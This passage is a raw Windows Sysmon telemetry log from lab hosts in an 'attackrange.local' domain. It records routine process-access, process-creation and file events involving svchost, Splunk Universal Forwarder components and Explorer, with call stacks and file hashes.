10341000x8000000000000000807763Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F5-60EB-7C79-00000000D001}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807762Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807761Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807760Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807759Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807758Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807757Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807756Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807755Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807754Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F4F5-60EB-7C79-00000000D001}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807753Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807752Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F5-60EB-7C79-00000000D001}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807751Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.556{0C1E0330-F4F5-60EB-7C79-00000000D001}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807750Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.553{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BB1A6BBD5005E396E2BC2E8F1A35F81,SHA256=27D349852DD56A40E314801C466F391496E969CD770B168E598888138C07170B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807749Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3144A7F2F7959972567AD179CB344BF3,SHA256=D5711ECBE95985246DB00AA0317E96C79841F32A28853933AC68F9F525BA0CF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807748Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E921234677B48FFF6322965F6F8F522,SHA256=8F1D945BFEB066AC11C16A017C962834D39B7FD237F3FAE6B5F41AFC09B61666,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:25.331{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x8000000000000000807793Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.928{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F6-60EB-7E79-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807792Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.928{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807791Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.928{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807790Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.928{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807789Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.928{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807788Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.912{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807787Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.912{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807786Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.912{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807785Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.912{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807784Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.912{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\